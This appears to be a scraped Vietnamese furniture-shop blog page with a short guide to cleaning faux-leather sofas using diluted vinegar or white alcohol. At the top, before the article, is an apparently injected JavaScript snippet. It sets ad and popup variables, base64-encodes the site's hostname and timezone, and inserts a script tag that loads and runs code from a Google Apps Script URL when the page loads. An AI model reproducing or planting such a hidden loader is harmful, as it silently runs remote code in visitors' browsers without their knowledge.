var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Cách làm sạch sofa giả da với giấm và rượu trắng

Sử dụng ghế sofa da trong phòng khách sẽ mang đến không gian nội thất sang trọng nhưng bạn cũng phải vệ sinh ghế hàng ngày hoặc loại bỏ những vết bẩn thường xuyên để mang đến giá trị thẩm mỹ cao nhất cho ngôi nhà. Tham khảo cách làm sạch sofa giả da sau đây của Nội Thất Xinh để mang đến không gian nội thất đẹp cho ngôi nhà.

Cách làm sạch sofa giả da với giấm

Giấm có tác dụng tẩy rửa tốt những vết bẩn bám trên vải hay cả trên ghế sofa da đẹp, vì vậy dùng dung dịch này để làm sạch ghế sofa giả da của bạn cũng là điều hoàn toàn có thể. Tuy nhiên bạn phải chú ý đến nồng đồ của loại dung dịch này, bởi chúng rất dễ dàng làm mất màu ghế sofa của bạn nếu bạn dùng quá nhiều.

Cách làm sạch sofa giả da với giấm và rượu trắng

Giấm trắng giúp làm sạch ghế sofa hiệu quả

Bạn có thể pha loãng giấm với nước ấm sau đó dùng khăn sạch để nhúng vào dung dịch và lau lên toàn bộ bề mặt của ghế sofa phòng khách. Hoặc bạn cũng có thể dùng khăn ướt để nhúng vào dung dịch giấm, khăn ướt cũng có tác dụng pha loãng giấm khi bạn vệ sinh ghế sofa.

Cách làm sạch sofa giả da với rượu trắng

Rượu trắng cũng có tác dụng tẩy rửa vết bẩn trên ghế sofa vô cùng hiệu quả, bạn pha dung dịch rượu trắng với nước ấm theo tỉ lệ 1:1 để bảo vệ chất liệu da của bạn không bị tổn hại. Dung dịch này có khả năng tẩy những vết nấm mốc trên ghế sofa da do vi khuẩn hoặc những vết cáu ghét do bụi bẩn lâu ngày không được làm sạch.

Cách làm sạch sofa giả da với giấm và rượu trắng

Pha rượu và nước ấm với tỷ lệ 1:1

Pha dun dịch đúng tỷ lệ sau đó, sử dụng khăn sạch để lau trên bề mặt của vết bẩn bạn sẽ thu được những hiệu quả bất ngờ, ghế sofa không chỉ sạch đẹp mà còn trở nên sáng bóng hơn.

Việc vệ sinh mẫu sofa đẹp thường xuyên trong phòng khách không chỉ mang đến không gian sống an toàn, đẹp mắt hơn mà giữ vẻ đẹp như mới dành cho bộ ghế sofa của bạn.

Cách làm sạch sofa giả da với giấm và rượu trắng

Rượu làm sạch vết bẩn hiệu quả trên ghế sofa da

Với cách làm sạch sofa giả da với giấm và rượu mà Nội Thất Xinh giới thiệu cho các bạn sẽ bảo quản bộ ghế sofa cao cấp và kéo dài thời gian sử dụng lâu hơn.

=> Xem thêm: Cách chọn ghế sofa phù hợp với phòng khách nhà phố.